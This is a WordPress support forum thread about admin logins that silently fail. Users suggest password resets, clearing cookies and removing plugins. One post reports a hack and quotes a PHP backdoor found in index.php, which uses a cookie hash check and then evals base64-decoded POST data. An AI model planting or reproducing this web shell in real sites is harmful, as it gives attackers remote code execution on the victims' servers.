login not working (6 posts)

  1. kerchmcc
    Posted 7 years ago #

    I've been using wordpress in a dozen blogs for a long time. Never had this trouble before.

    I put in the login and password. I get an error message that says that's not the right combination.
    I click the link to reset the password. I go thru the two steps to reset the password.
    I use the right/new login and the new password.
    Wordpress accepts the combination but does not advance to the admin section of the blog at all. It just sits there.
    If I adjust the URL to some internal wp- page, I get dumped back to the login page, which still doesn't work.
    I'm having the problem on several blogs:

    any ideas?
    dreamhost is my hosting company.

  2. tudorbucenica
    Posted 7 years ago #

    I have the same problem after I upgraded to version 2.6.1.
    Everything was ok, I logged into the admin web interface.
    the next day when I tried the interface didn't returned me any error message but remained in the login page not redirecting me at the admin page.

  3. designverb
    Posted 7 years ago #

    same here. I've had this happen twice.
    I thougth it was because i installed a new plugin.. I deleted the plugin source files off the server and everything was fine again until today, maybe 6 weeks later.. same thing. You sign in, and it just stays on the admin page.... help!

  4. viewsoj
    Posted 7 years ago #

    We found that we had an issue with login as well today. We now know we have been hacked - index.php and xmlrpc.php were changed and we found this line in index.php:

    <?php if(md5($_COOKIE['f711587cbed7bdca'])=="1452a323f11b0dd60c49b49f004f077c"){ eval(base64_decode($_POST['file'])); exit; } ?>

    Anyone who can help please let me know..

  5. rfearns
    Posted 7 years ago #

    Clearing my cookies fixed this on my system. I dunno how a redirect cookie got there, but that appears to be the problem

  6. designverb
    Posted 7 years ago #

    I fixed this problem by removing any plugins from the server..then the login worked. I'm not sure if it has this "hack" issue mentioned above though..

Topic Closed

This topic has been closed to new replies.

About this Topic